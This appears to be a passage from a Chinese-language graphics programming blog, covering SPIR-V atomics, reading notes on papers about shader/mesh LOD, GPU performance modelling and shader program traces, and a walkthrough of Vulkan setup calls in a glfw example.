%objectBufferType = OpTypeStruct %_runtimearr_ObjectData
%_ptr_Uniform_objectBufferType = OpTypePointer Uniform %objectBufferType
%objectBuffer = OpVariable %_ptr_Uniform_objectBufferType Uniform

; 访问
; 使用 OpAccessChain 指令，该指令是 base, indices... 格式
; 此例子： objectBuffer[0 th][index th][0 th] 来获得 model 的指针，该指针之后可以 load / store
         %29 = OpLoad %int %index
         %31 = OpAccessChain %_ptr_Uniform_v4float %objectBuffer %int_0 %29 %int_0

Atomic 操作

https://github.com/KhronosGroup/Vulkan-Guide/blob/main/chapters/atomics.adoc

GLSL 源码：

#version 450

layout (location = 0) out vec4 outFragColor;

// std430 vs std140: https://www.khronos.org/opengl/wiki/Interface_Block_(GLSL)
layout(std430, set = 1, binding = 0) buffer statsBufferType {
    int totalInvocations;
} statsBuffer;


void main() 
{
    // returns the value before the add
    int globalIdx = atomicAdd(statsBuffer.totalInvocations, 1);
    outFragColor = vec4(1.0);
}

SPIR-V 反汇编：

; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 26
; Schema: 0
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450
               OpEntryPoint Fragment %main "main" %outFragColor
               OpExecutionMode %main OriginUpperLeft
               OpSource GLSL 450
               OpName %main "main"
               OpName %globalIdx "globalIdx"
               OpName %statsBufferType "statsBufferType"
               OpMemberName %statsBufferType 0 "totalInvocations"
               OpName %statsBuffer "statsBuffer"
               OpName %outFragColor "outFragColor"
               OpMemberDecorate %statsBufferType 0 Offset 0
               OpDecorate %statsBufferType BufferBlock
               OpDecorate %statsBuffer DescriptorSet 1
               OpDecorate %statsBuffer Binding 0
               OpDecorate %outFragColor Location 0
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
        %int = OpTypeInt 32 1
%_ptr_Function_int = OpTypePointer Function %int
%statsBufferType = OpTypeStruct %int
%_ptr_Uniform_statsBufferType = OpTypePointer Uniform %statsBufferType
%statsBuffer = OpVariable %_ptr_Uniform_statsBufferType Uniform
      %int_0 = OpConstant %int 0
%_ptr_Uniform_int = OpTypePointer Uniform %int
      %int_1 = OpConstant %int 1
       %uint = OpTypeInt 32 0
     %uint_1 = OpConstant %uint 1
     %uint_0 = OpConstant %uint 0
      %float = OpTypeFloat 32
    %v4float = OpTypeVector %float 4
%_ptr_Output_v4float = OpTypePointer Output %v4float
%outFragColor = OpVariable %_ptr_Output_v4float Output
    %float_1 = OpConstant %float 1
         %25 = OpConstantComposite %v4float %float_1 %float_1 %float_1 %float_1
       %main = OpFunction %void None %3
          %5 = OpLabel
  %globalIdx = OpVariable %_ptr_Function_int Function
         %14 = OpAccessChain %_ptr_Uniform_int %statsBuffer %int_0
         %19 = OpAtomicIAdd %int %14 %uint_1 %uint_0 %int_1             ; Pointer = %14
                                                                        ; Memory Scope = %uint_1 = 1
                                                                        ; => Scope is the current device
                                                                        ; Semantics = %uint_0 = 0
                                                                        ; => None (relaxed)
                                                                        ; Value = %uint_1 = 1
               OpStore %globalIdx %19
               OpStore %outFragColor %25
               OpReturn
               OpFunctionEnd

Memory Scope: https://registry.khronos.org/SPIR-V/specs/unified1/SPIRV.html#Scope_-id-

Coming soon

Matrix 类型
导数 dFdx / dFdy & discard
- https://github.com/gpuweb/gpuweb/issues/361
- http://www.xionggf.com/post/opengl/an_introduction_to_shader_derivative_functions/
Group Ops

论文阅读 | Automatic Mesh and Shader Level of Detail 2023-02-21

本篇文章给出了在自适应划分的距离组下同时优化网格和 Shader 的 LOD 的优化算法。

文章中首先提出了被称为“交替优化”的优化算法，其中首先对 Shader 利用遗传算法进行变异，得到若干变体，再利用网格简化算法来以 image loss 进行网格简化，使得在给定距离上每个变体对应的运算代价小于给定开销，且误差上满足要求。之后，这些变体会进行排序，前 N% 的变体进入下一轮交替优化，反复多轮后得到结果。

针对交替优化耗时较长的问题，文章中还提出了“分别优化”的算法。该算法会首先分别对网格和 Shader 独立的进行简化，得到一系列质量单调下降的 Shader 和网格变体列，然后再针对每个距离组选择合适的网格和 Shader 对。为了让 LOD 组间的变化尽可能平滑，文章还设置了最平滑的 LOD 切换路线的查找，以及 LOD 组数量的优化操作。

方法总览

Formulation

对于 Shader 和网格简化问题，定义三元组 $ (M_i, S_i, d_i) $，其中

$ M_i $ 为原网格 $ M $ 的第 $ i $ 个简化变体
$ S_i $ 为原 Shader $ S $ 的第 $ i $ 个简化变体
$ d_i $ 为距相机的距离

定义 $ \epsilon_a(i) $ 为简化 $ (M_i, S_i, d_i) $ 变体的绝对图像误差，其定义为

$$ \epsilon_a (i) = \int_H \| f(M_i, S_i, d_i) - \bar{f}(M, S, d_i) \| dH $$

这里的作为误差模型的积分域 $ H = V \times U \times X \times Y $ ，其中

$ V $ 为离散的若干个 view direction
$ U $ 若干 Shader uniform 参数，如光照方向
$ X \times Y $ 为图像空间的两个维度

这里的范数是 pixelwise RGB $ L^2 $ 范数。

另外，定义 $ \epsilon_t(i) $ 为两个简化组之间的视觉差异：

$$ \epsilon_t (i) = \int_H \| f(M_i, S_i, d_{i+1}) - f(M_{i+1}, S_{i+1}, d_{i+1}) \| dH $$

这样，LOD 优化问题就可以看作下面的数学问题：

$$ \mathop{\arg \min}_{M_i, S_i, d_i} t = Cost ( f(M_i, S_i, d_i) ) \\ \mathrm{s.t.}\quad \epsilon_a(i) < e_a (d_i) \cdot s_{d_i} $$

其中 Cost 为在该网格上应用此 Shader 进行着色的时间开销，$ e_a (d_i) $ 为在 $ d_i $ 距离的 absolute per-pixel error bound， $ s_{d_i} $ 为距离 $ d_i $ 时网格 $ M_i $ 的投影大小，

其中 $ e_a(d) $ 采用前面工作提出的一个启发函数：

$$ e_a(d) = (\frac{d-d_{near}}{d_{far} - d_{near}})^Q \cdot e_{max} $$

其中

$ d_{near} $ 和 $ d_{far} $ 是设置的视景体参数
$ e_{max} $ 是 maximum absolute per pixel error bound
- 也就是关于 $ e_t(i) $ 的积分项关于积分域里面各个部分的最大值
$ Q \in [0, 1] $ 反映了对误差的容忍程度

交替优化

Shader 简化

这里的 Shader 简化工作主要参考了前面的文章：

[3] Y. He, T. Foley, N. Tatarchuk, and K. Fatahalian, “A system for rapid, automatic shader level-of-detail,” ACM Trans. on Graph. (TOG), vol. 34, no. 6, p. 187, 2015.

[8] R. Wang, X. Yang, Y. Yuan, W. Chen, K. Bala, and H. Bao, “Automatic shader simplification using surface signal approximation,” ACM Trans. on Graph. (TOG), vol. 33, no. 6, p. 226, 2014.

[18] F. Pellacini, “User-configurable automatic shader simplification,”
ACM Trans. Graph., vol. 24, no. 3, pp. 445–452, 2005

[21] P. Sitthi-Amorn, N. Modly, W. Weimer, and J. Lawrence, “Genetic programming for shader simplification,” in ACM Transactions on Graphics (TOG), vol. 30, no. 6. ACM, 2011, p. 152.

将 Vertex Shader 和 Fragment Shader 转换为抽象语法树 (AST) 和程序依赖图 (PDG)
应用不同的化简规则来生成简化 Shader
- Operation Removal: 将 $ op(a, b) $ 省略为 $ a $ 或 $ b $
- Code Transformation: 将 per-pixel 的 pixel shader 操作移动到 per-vertex 或 per-tessellated-vertex 的操作来减少计算量
- Moving to parameter: 将参数用其均值替换（$ n \to average(n) $），并且替换到 “parameter stage” 中进行计算（详见 [3]），并将均值作为结果送入 GPU Shader 中

本文并没有对 Shader 本身的优化方面做出额外的创新。这些方法主要来源于 [3] 这篇文章。

Mesh 简化

Mesh 简化工作：

[4] M. Garland and P. S. Heckbert, “Surface simplification using
quadric error metrics,” in Proceedings of the 24th annual conference on
Computer graphics and interactive techniques. ACM Press/AddisonWesley Publishing Co., 1997, pp. 209–216.

[7] P. Lindstrom and G. Turk, “Image-driven simplification,” ACM
Transactions on Graphics (ToG), vol. 19, no. 3, pp. 204–241, 2000

主要用了 [7] 中的 Image-driven simplification 的方法。这个方法是基于顶点对折叠的，每次折叠选择使 image error 升高最低的一对顶点。

QEM

https://www.cs.cmu.edu/~./garland/Papers/quadrics.pdf
http://mgarland.org/research/quadrics.html
https://blog.csdn.net/lafengxiaoyu/article/details/72812681

QEM 是 SIGGRAPH’97 提出的经典算法，截至现在已经有大约 5000 次引用。

交替优化

给定网格 $ M $ 和 Shader $ S $，

搞 Shader 优化 (然后生成一堆变体 $ S_i $)
对于每个在 Pareto frontier 上的 $ S_i $，利用该 Shader 进行相应的 Mesh 简化，使得新的 $ M_j $ 在满足质量要求 (也就是 error <= absolute error bound) 的情况下为最简
Pareto frontier 上的 $ S_i $ 满足
- 不存在另一个 Shader，他的性能一样，质量更好
- 不存在另一个 Shader，他的质量一样，性能更好
将这些 $ (M_j, S_i) $ 按渲染性能排序，取前 20% 作为种子进入下一轮迭代

分别优化

生成网格变体

因为没有任何关于简化后 Shader 的信息，所以作者此处采用原 Shader 进行着色后 supersampled / filtered 的图片作为 loss 环节进行网格简化。

因为某些边简化之后对视觉表现没有什么影响，所以这里只选取 K (实现中 K = 500) 个有较大 error 变化的简化网格作为候选变体。

生成 Shader 变体

理论上，对于不同的场景配置 (简化网格 & 距离配置)，最优的 Shader 变体是不同的。

但是，因为

First, as has been proven in prior work [3], the performance and error of shader variants can be predicted instead of being actually evaluated. In this way, we do not need to actually render every shader variant under all scene configurations.

在 [3] 中，性能的预测是通过一种简单的启发函数，即 scalar fp ops + 100 * texture ops 来预测的（不同 Shader stage 有不同权重，parameter 数量有额外惩罚）

error 的评价是通过 error cache 和偶尔的重新 evaluate 来实现的
Second, we noted that for one shader variant with one simplified mesh, the shading errors at distances could be approximated by filtering the rendered image at the closest distance.

通过在最近距离生成着色结果，再进行 filter 来模拟在远处的结果
Finally, we further observed that although these Pareto frontiers may change with scene configurations, the shader variants on Pareto frontiers are similar at similar distances and with similarly simplified meshes.

Pareto 面上的 shader 变体基本上是比较稳定的，随着场景配置的变化不是很多

所以，作者最后只选择有代表性的距离和有代表性的简化网格来计算最优 Shader 变体，而不是穷举所有场景配置。

作者选择均匀的从 N 组距离组里面选择 4 组，然后每个距离组里面选择 10 个前面的简化网格（即 Pareto 面左右的十个），就得到了 40 个组合。然后用 genetic programming 的优化方法来得到每个 (距离, 网格) 组上的最优简化 Shader。这些优化好的 Shader 变体都放到一个数组里面。

然后，作者近似的认为整个问题是一个凸区域上找可行域边界的问题，所以只需要 1D search，而不需要遍历 2D 区域。

然后，再用 find smooth path 的技术来获得比较连续的 LOD transition。

具体来说，就是每个边的权重是在边界处的图像损失，这样图像损失小的转换会更容易被选中。

最后，合并区别不大的 LOD 组。

论文阅读 | 平衡精确度和预测范围的黑盒 GPU 性能建模 2023-02-16

简介

本篇文章提出了一种跨机器，黑盒，基于微测试 (microbenchmark) 的方法来解析的对不同实现变体的 OpenCL kernel 的执行时间进行预测和最优 kernel 选择。

简单来说，本文大的思路是，收集一些 kernel 中出现的特征和对应特征在运行时会出现的频率，利用 microbenchmark 在目标平台上测量这些特征每次出现会花费的运行时间，再用一个（多重）线性模型来拟合最后的运行时间。

由于文章比较长，此处将文章的大概结构列举如下：

Section 1: 简介
Section 2: 解释性的例子
Section 3: 本文贡献概况
Section 4: 本文采用的假设和局限性
Section 5: 收集 kernel 统计信息
Section 6: 建模 kernel 执行时间
Section 7: 校准模型参数
Section 8: 结果展示
Section 9: 作者调研到的、其它相关的性能建模方法

本文的假设和局限性

本文提到的一些 assumptions：

(usefulness) 可以帮助用户理解给定机器的性能特性，并且给优化器提供变体性能数据预测参考，同时降低需要在目标系统实际测量的数据数量
(accuracy) 根据检索到的相关文献显示，在本文提及的 GPU kernel 性能预测问题上，没有方法可以一致的获得小于个位数的预测误差，所以本文也设定这样的目标
(cost-explanatory): 和其它基于排名的方法不同 (Chen et al. (2018))，虽然本文优化的目标是在各种变体中进行选择，但是本文中模型的主要输出为运行时间，且采用比较可解释的线性模型进行建模

本文提到的一些局限：

硬件资源的利用率：
- 硬件资源的利用率会影响最终的性能。比如，峰值浮点性能受 SIMD lane 使用率影响，片上状态存储器 (VGPR, Scratchpad Memory) 会影响调度槽位的利用率，进而影响延迟隐藏的能力
- 不过，采用本文的方法，基本的性能损失系数是比较容易解释和估计的。比如，实际的内存带宽利用率，以及峰值 FLOP/s
- 即使无法达到硬件资源的全部利用，对于硬件资源利用率随参数变化相对稳定的场合，本文的模型仍然可以适用。不过对于变化的情况，让本文提出的模型适用的唯一可行方法，就是将模型的粒度调低到类似 SIMD lane 的水平，这样利用率的变化就不再相关了。ECM 系列模型就是这样考虑这个问题的。
  
  ?
- 为了简化的处理这个问题，本文采用 workgroup size 恒定为 256 的参数设定。
程序建模上的简化：
- 本文的模型中，主要检测的是基于某种特殊类别的操作 (e.g. 浮点操作，特殊类型的访存) 和检测到该特征出现的次数，其中次数被建模为 non-data-dependent 的一个特征。
  - Polyhedrally-given loop domain?
- 所有分支指令都假设两个分支均会执行，即假设 GPU 采用 masking 的方式进行执行。
  
  文章认为这和 GPU 的行为是匹配的，不过显然不完全是。较新的 GPU 是同时支持 branching 和 masking 的。masking 存在的意义是对于短分支来说，可以不打断流水线。
内存访问开销评估：
- 内存访问的开销受到程序访问的局部性，以及对于 banked memory 来说的 bank 竞争问题的影响。
- 本文将内存访问切分成了两种：
  - 对于各个程序都常见的，比较简单的访存模式，用 Section 6.1.1 的办法按 interlane stride, utilization radio 和 data width 进行分类
    
    quasi-affine?
  - 对于更复杂的访存模式，在 Section 7.1.1 中提供一种单独抽出来在循环里面按该模式进行访存，并且进行测量的机制
平台无关：
- 本文提出的系统作用于 OpenCL 上，但是相似的系统在 CUDA 上也可以比较轻松的实现。

收集 kernel 统计信息

计算每个特征的预期出现次数

前面提到，本文假设程序中出现的所有循环，其循环次数和本次运行所使用的数据无关，即 non-data-dependent。

这种情况下，如果要求解循环体中每个语句的运行次数，简单的做法是将所有循环展开，不过这样效率会比较低。事实上，此处可以把问题看作：在 $ d $ 维的整数空间 $ \mathrm{Z}^d $ 中，可行区域是由一些约束条件构成的超平面截出来的一个子区域，某个语句的循环次数就是在该子区域中整数格点的数目。

文章汇总提到，用 barvinok 和 isl 库一起，可以解决前面这个数循环体内语句执行次数的问题，其中 barvinok 是基于 Barvinok 算法的，这是一个比较高效的、计算有理凸多胞形中的格点数目的算法。

当然，还要分析好一条语句内真正进行计算或数据搬运的相应特征和次数。

为什么要抽象成有理凸多胞形？这是因为真正循环的次数和 Kernel 本身的一些参数，以及 Kernel 的 Launch parameters 也有关系，这里希望带着这些参数做符号计算，让模型更有用一些（比如说，优化这些参数会变得容易）

计数粒度 (count granularity)

计数粒度设计的思路是，计数出来的次数尽可能贴近真实 GPU 硬件中所执行操作的次数。

比如，我们知道，在 OpenCL 的调度模型中，每个 sub-group 会尽可能匹配 GPU 调度的最小单位，并且视硬件能力 sub-group 内部会支持一些 reduce 和 scatter 等原语，并且算数指令一般也是以 sub-group 为粒度进行调度和实现的。这样，算术指令就应该以 sub-group 为粒度计数。

当然，具体 sub-group 的数目是依赖具体的 Kernel launch parameters 的，不过这里对前面参数的依赖是多项式形式的 (比如 work-group count / 32），所以可以作为一个含参的量，让前面的循环次数计算也成为一个含参的值。

粒度有如下三种：

per work-item
- 同步障操作 (barrier synchronization)
per sub-group （subgroup size 需要用户提供）
- 片上操作：算数指令和 local memory 访问
- uniform 访问：global memory 访问，但是 lid(0) stride 0，即多个线程访问同一块内存区域
per work-group （没有给出例子）

这里的讨论很不详细，需要和下面一起看

建模 kernel 执行时间

$$ T_\text{wall}({\bf n}) = \text{feat}^\text{out}({\bf n}) \approx g(\text{feat}^\text{in}_0({\bf n}), ..., \text{feat}^\text{in}_j({\bf n}), p_0, ..., p_k) $$

其中：

$ {\bf n} $ 是整个计算过程中为常数的、仅与各种变体相关的整数向量
$ \text{feat}^\text{in}_j({\bf n}) $ 是某种单元特征的出现次数（比如单精度 FP32 乘法数）
$ p_i $ 是硬件相关的校正参数
$ g $ 是用户提供的可微函数

kernel 特征

数据移动特征

对于大多数计算 kernel 来说，数据搬运所占的开销是大头。

内存访问模式：

内存类别：global / local
访问类型：load / store
the local and global strides along each thread axis in the array index
- 也就是说，每次 gid(0), gid(1), lid(0), lid(1) 自增一的时候，对 array 数组访问的偏移要分别增加多少
the ratio of the number of element accesses to the number of elements accessed (access-to-footprint ratio, or AFR)
- AFR = 1: every element in the footprint is accessed one time
- AFR > 1: some elements are accessed more than once
  - 这样 Cache 就可能会对速度有加成了

文章中提到，解析形式的模型需要建模很多机器细节，比如 workgroup 调度，内存系统架构等，来达到和黑盒模型相似的精度。一个例子是
1
2
3
4
for (int k_out = 0; k_out <= ((-16 + n) / 16); ++k_out)
  ...
  a_fetch[...] = a[n*(16*gid(1) + lid(1)) + 16*k_out + lid(0)];
  b_fetch[...] = b[n*(16*k_out + lid(1)) + 16*gid(0) + lid(0)];
这个例子里面的内存访问模式如下：

Array Ratio Local strides Global strides Loop stride

a n/16 {0:1, 1:n} {0:0, 1:n*16} 16

b n/16 {0:1, 1:n} {0:16, 1:0} 16*n

这两个例子的性能差距在 5 倍左右。

With this approach, a universal model for all kernels on all hardware based on kernel-level features like ours could need a prohibitively large number of global memory access features and corresponding measurement kernels. This motivates our decision to allow proxies of “in-situ” memory accesses to be included as features, which in turn motivates our ‘work removal’ code transformation, discussed in Section 7.1.1. This transformation facilitates generation of microbenchmarks exercising memory accesses which match the access patterns found in specific computations by stripping away unrelated portions of the computation in an automated fashion.

Specifying Data Motion Features in the Model: 弄个 aLD, bLD, f_mem_access_tag

也可以手动指定，不用运行时测量：

model = Model(
  "f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  "p_f32l * f_mem_access_local_float32 + "
  "p_f32ga * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:0}_afr:>1 + "
  "p_f32gb * f_mem_access_global_float32_load_lstrides:{0:1;1:>15}_gstrides:{0:16}_afr:>1 + "
  "p_f32gc * f_mem_access_global_float32_store"
)

显式语法格式如下："f_mem_access_tag:<mem access tag>_<mem type>_<data type>_<direction>_lstrides:{<local stride constraints>}_gstrides:{<global stride constraints>}_afr:<AFR constraint>"

算术操作特征

特征：

操作类型：加法、乘法、指数
数据类型：float32, float64

本文中的工作不考虑整数算术特征，因为在模型考虑的 kernel 变体中，整数算术只用在了数组下标计算中。

同步特征

特征：

局部同步障 (local barriers)
kernel 启动

这里 Local barriers 是 per work-item 的，然后根据实际程序同步的需要，可能需要进行乘以同时进行同步的 work item 数量。

简单来说就是，认为参与同步的 thread 越多越耗时。

Recall that the statistics gathering module counts the number of synchronizations encountered by a single work-item, so depending on how a user intends to model execution, they may need to multiply a synchronization feature like local barriers by, e.g., the number of work-groups, a feature discussed in the next section.

A user might incorporate synchronization features into this model as follows:
1
2
3
4
5
6
model = Model("f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  ...
  "p_barrier * f_sync_barrier_local * f_thread_groups + "
  "p_launch * f_sync_kernel_launch"
)

其他特征

Thread groups feature
- 给定 workgroup count，进行不同 workgroup count 间启动时间补偿
OpenCL wall time feature
- 给定 platform 和 device 下，执行 60 遍获得平均 walltime，作为输出特征
- “We measure kernel execution time excluding any host-device transfer of data.”

一个完整的模型：

model = Model("f_cl_wall_time_nvidia_geforce",
  "p_f32madd * f_op_float32_madd + "
  "p_f32l * f_mem_access_local_float32 + "
  "p_f32ga * f_mem_access_global_float32_load_lstrides :{0:1;1:>15}_gstrides:{0:0}_afr:>1 + "
  "p_f32gb * f_mem_access_global_float32_load_lstrides :{0:1;1:>15}_gstrides:{0:16}_afr:>1 + "
  "p_f32gc * f_mem_access_global_float32_store + "
  "p_barrier * f_sync_barrier_local * f_thread_groups + "
  "p_group * f_thread_groups + "
  "p_launch * f_sync_kernel_launch"
)

校准模型参数

Work Removal Transformation: a code transformation that can extract a set of desired operations from a given computation, while maintaining overall loop structure and sufficient data flow to avoid elimination of further parts of the computation by optimizing compilers

Work Removal 变换会把 on-chip 工作从 kernel 中去掉，达成两方面目的：

测试 on-chip work 和 global memory access 各自占用时间，决定是否要进行 latency hiding
测试某种特殊访存模型的时间占用

Measurement kernel 设计

Global memory access
- AFR = 1: Fully specified by local strides, global strides, data size
  - That is, patterns that do not produce a write race and not nested inside sequential loops
  - Performs global load from each of a variable number of input arrays using the specified access pattern
  - Each work-item then stores the sum of the input array values it fetched in a single result array
  - Params: data type, global memory array size, work-group dimensions, number of input arrays, thread index strides
- AFR > 1:
  - Use Work Removal Tranformation to generate dedicated measurement kernel.
Arithmetic operations
- First, have each work-item initialize 32 private variables of the specified data type
- Then, perform a loop in which each iteration updates each variable using the target arithmetic operation on values from other variables
  - This is to create structural dependency
- We unroll the loop by a factor of 64 and arrange the variable assignment order to achieve high throughput using the approach found in the Scalable HeterOgeneous Computing (SHOC) OpenCL MaxFlops.cpp benchmark (Danalis et al. 2010).
  - the 32 variable updates are ordered so that no assignment depends on the most recent four statements
    - 32 is used because it permits maximum SIMD lane utilization & prevent from spilling too many registers
  - we sum the 32 variable values and store the result in a global array according to a user-specified memory access pattern
    - (NOTE: The actual cost can be deduced by change the runcount of arithmetic ops)
    - include the global store to avoid being optimized away
Local memory access
- Tags: data type, global memory array size, iteration count, and workgroup dimensions
  - Data type determines the local data stride
1. each workitem initializes one element of a local array to the data type specified
2. Then we have it perform a loop, at each iteration moving a different element from one location in the array to another.
  - We avoid write-races and simultaneous reads from a single memory location, and use an lid(0) stride of 1, avoiding bank conflicts.
3. After the loop completes, each work-item writes one value from the shared array to global memory
Other features
- executes a variable number of local barriers, to measure operation overlapping behaviour (Section 7.4)
- Empty kernel launch, to measure kernel launching overhead

文章提出，Using a sufficiently high-fidelity model, we expect that users will be able to differentiate between latency-based costs of a single kernel launch and throughput-related costs that would be incurred in pipelined launches.

怎么做？

计算模型参数

采用最小二乘法来进行拟合，得到 feature 向量中给定 feature 的出现次数和总的运行时间的关系。

Operation Overlap 建模

Global memory 和 On-chip 的延迟之间是有可能互相隐藏的。

本文的建模基于简单的想法，即 $ \max (c_{onchip}, c_{gmem}) $，两类操作的时间求 $ \max $ 操作。

不过 $ \max $ 不是很可导，所以采用一个可微的近似函数来做，详情可以看论文。

论文阅读 | Learning from Shader Program Traces 2023-01-03

简介

Program trace
- In software engineering, a trace refers to the record of all states that a program visits during its execution, including all instructions and data.
- 本文提到的 Shader program trace，只包括中间结果 (data)，而不包括程序序列 (instruction)。

Since the fragment shader program operates independently per pixel, we can consider the full program trace as a vector of values computed at each pixel – a generalization from simple RGB.

方法

输入是用（嵌入到 Python 的） DSL 写的 fragment procedural shader program，翻译成 Tensorflow 程序
- 可以同时输出渲染好的图片和生成的 program trace
- 分支展开、循环 unroll
- These policies permit us to express the trace of any shader as a fixed-length vector of the computed scalar values, regardless of the pixel location

输入特征化简

编译器优化
- 忽略常量值、计算图上重复的节点，因为其在不同 pixel 位置的运行结果应该高度统一
不生成内建函数的 trace
检测并筛除迭代改进模式的循环中的中间 trace 结果
- 比如，raymarching 找 closest intersection 的迭代
均匀的特征下采样
- The most straightforward strategy is to subsample the vector by some factor n, retaining only every nth trace feature as ordered in a depth first traversal of the compute graph
其它采样方案 (都不太好用)
- clustering
- loop subsampling
- first or last
- mean and variance

We first apply compiler optimizations, then subsample the features with a subsampling rate that makes the trace length be most similar to a fixed target length.

For all experiments, we target a length of 200, except where specifically noted such as in the simulation example.

After compiling and executing the shader, we have for every pixel: a vector of dimension N: the number of recorded intermediate values in the trace

特征白化

主要是为了解决 shader trace 里面的异常值，防止干扰训练和推理。用的是 Scaling + clamping。

Check if the distribution merits clamping
- If N <= 10, no need to clamp
- Else, do clamp
  - Discard NaN, Inf, -Inf
  - let $P_0$ = Lowest p’th percentile, $P_1$ = highest p’th percentile, superparam $ \gamma $
  - Clamp to $ [P_0 − \gamma(P_1− P_0), P_1 + \gamma(P_1 − P_0)] $
- Do rescale
  - for each intermediate feature, rescale the clamped values to the fixed range $ [-1,1] $
  - Record the bias and scale used (in rescaling)

The scale and bias is recorded and used in both training and testing, but the values will be clamped to range
[-2, 2] to allow data extrapolation.

感觉有点乱…

网络

结构

1x1 Conv + Feature Reduction (N = 200 -> K = 48)
1x1 Conv * 3
Dilated Convolution (1, 2, 4, 8, 1)
1x1 Conv * 3
1x1 Conv + Feature Reduction (K = 48 -> 3, that is, RGB color output)

损失函数

$ L_b = L_c + \alpha L_p $

$ L_c $ 是 RGB 图像上的标准 $ L_2 $ loss
$ L_p $ 是 The Unreasonable Effectiveness of Deep Features as a Perceptual Metric 这篇文章中给出的损失函数度量 LPIPS
- 大概就是，做了一个图像相似数据集，弄了很多 distortions 和 CNN 常见任务输出的图片，做 2AFC 和 JND，随后学习这个 metric
- 深度特征度量图像相似度的有效性——LPIPS 这篇知乎文章比较不错

下面还有个 Appendix D，里面有实验的 GAN 的 loss

训练策略

结果展示

和一个 Baseline 方法 RGBx 对比，这个 Baseline 用的手挑特征 normal, depth, diffuse, specular color (where applicable) 来作为输入进行学习。

Denoising fragment shaders

目标是用 1spp 图像来学习 1000spp 的 reference image。

Reconstructing simplified shaders

这个任务是，从简化后的 Shader 的运行结果中，重建原来 Shader 的运行结果。

简化 Shader 采用的是 Loop perforation 和 Genetic Programming Simplification。

用两个 Conditional GAN，分别称为 Spatial GAN 和 Temporal GAN，一个用来从 1spp 的图 $ c_x $ 生成 Ground Truth (原来的 Shader 运行结果) $ c_y $，另一个用来从前面三帧的 1spp 输出 + 前面两帧的 Spatial GAN 的生成器的输出来生成下一帧，也就是用序列 $ \tilde {c_x} $ 生成序列 $ \tilde {c_y} $。

GAN related:

四天搞懂生成对抗网络（一）——通俗理解经典GAN

四天搞懂生成对抗网络（二）——风格迁移的“精神始祖”Conditional GAN

Postprocessing filters

学习一些后处理效果的 Shader，如 edge-aware sharpening filter 和 defocus blur 效果。

Learning to approximate simulation

学习一些进行模拟的 Shader 将来的运行结果。

Trace 有效性分析

这里主要做了两件事：

哪些 Input feature 比较重要？
- 这里作者采用求 Loss 关于 input trace feature 的一阶导数来评价重要性
挑一个 Subset 来做训练？
- 给定 m 个 feature 的训练 budget，如果要评价任意的 subset，即从 N 个里面抽 m 个来做训练的话，开销太大
  - Oracle: 按 1 中所述重要性评分的前 m 个 input trace feature
  - Opponent: 按 1 中所述重要性评分的后 m 个 input trace feature
  - Uniform: 随便挑 m 个
- 发现 Oracle > Opponent > Uniform
多个 Shader 一起学习
- 多个 Shader 一起学习降噪任务，感觉就像训练一个真·denoiser

一个示例 Vulkan 程序的全流程记录 2022-12-29

简介

一些有用的链接：

Khronos Blog - Understanding Vulkan Synchronization

Yet another blog explaining Vulkan synchronization - Maister’s Graphics Adventures

本文主要分析 glfw 库的 tests/triangle-vulkan.c 文件。

流程

Update 2023-02-13: 补上了漏掉的创建逻辑设备的一步 vkCreateDevice

demo_init
- demo_init_connection
  - glfwSerErrorCallback
  - gladLoadVulkanUserPtr: 设定 glad 使用 glfwGetInstanceProcAddress 来装载所有的 Vulkan 函数指针地址
- demo_init_vk
  - 启用验证层:
    - vkEnumerateInstanceLayerProperties
    - demo_check_layers: 检查需要的验证层集合是否存在
  - glfwGetRequiredInstanceExtensions: 获得需要的平台 Surface 扩展
  - 准备启用的 Instance 扩展列表
    - VK_EXT_debug_report
    - VK_KHR_portability_enumeration
  - vkCreateInstance
  - vkEnumeratePhysicalDevices
  - 检查设备是否支持 VK_KHR_swapchain
    - vkEnumerateDeviceExtensionProperties
  - vkCreateDebugReportCallbackEXT
  - vkGetPhysicalDeviceProperties
  - vkGetPhysicalDeviceQueueFamilyProperties
  - vkGetPhysicalDeviceFeatures
demo_create_window
- glfwWindowHint
- glfwCreateWindow
- glfwSetWindowUserPointer
- glfwSetWindowRefreshCallback
- glfwSetFramebufferSizeCallback
- glfwSetKeyCallback
demo_init_vk_swapchain
- glfwCreateWindowSurface
  - 内部调用 vkCreateWin32SurfaceKHR
- 查找支持 Present 和 Graphics 的 Queue，需要是同一个 Queue
  - vkGetPhysicalDeviceSurfaceSupportKHR
  - queueFlags & VK_QUEUE_GRAPHICS_BIT
- demo_init_device
  - vkCreateDevice: 创建 logical device
    - VkDeviceCreateInfo
      - .pQueueCreateInfos
        
        .queueFamilyIndex
        
        .queueCount
        
        .pQueuePriorities
      - .ppEnabledLayerNames
      - .ppEnabledExtensionNames: 要启用的设备扩展
        
        似乎把 Instance 扩展的名字扔进去也行？
- vkGetDeviceQueue
- 选择一个最优的 Surface format
  - vkGetPhysicalDeviceSurfaceFormatsKHR
- vkGetPhysicalDeviceMemoryProperties

demo_prepare

创建 Command Pool
- vkCreateCommandPool
分配一个 Command Buffer
- vkAllocateCommandBuffers
  - VkCommandBufferAllocateInfo:
    - .level = VK_COMMAND_BUFFER_LEVEL_PRIMARY
    - .commandBufferCount = 1
demo_prepare_buffers
- 检查 Surface Capabilities 和 Present Modes
  - vkGetPhysicalDeviceSurfaceCapabilitiesKHR
  - vkGetPhysicalDeviceSurfacePresentModesKHR
- 创建交换链
  - 计算 Swapchain Image Extent
  - .preTransform 使用 VK_SURFACE_TRANSFORM_IDENTITY_BIT_KHR，如果没有则使用当前 Surface Transform
  - .minImageCount 使用 Surface Capabilities 的 minImageCount
  - .presentMode 选择 VK_PRESENT_MODE_FIFO_KHR
  - vkCreateSwapchainKHR
  - 如果有老的交换链： vkDestroySwapchainKHR
  - vkGetSwapchainImagesKHR 拿到 VkImage 格式的交换链图像
  - 为每个交换链图像调用 vkCreateImageView 创建 Color Attachment View
    
    Componet Swizzle: TODO check spec
demo_prepare_depth
- vkCreateImage 创建 depth image
  - .arrayLayers 可以指定 texture array 的 dimension
- vkGetImageMemoryRequirements 获得 image 的内存要求
- 选择内存大小和内存类型
  - memory_type_from_properties : todo check this
- vkAllocateMemory 分配 image 所需内存，返回 VkDeviceMemory
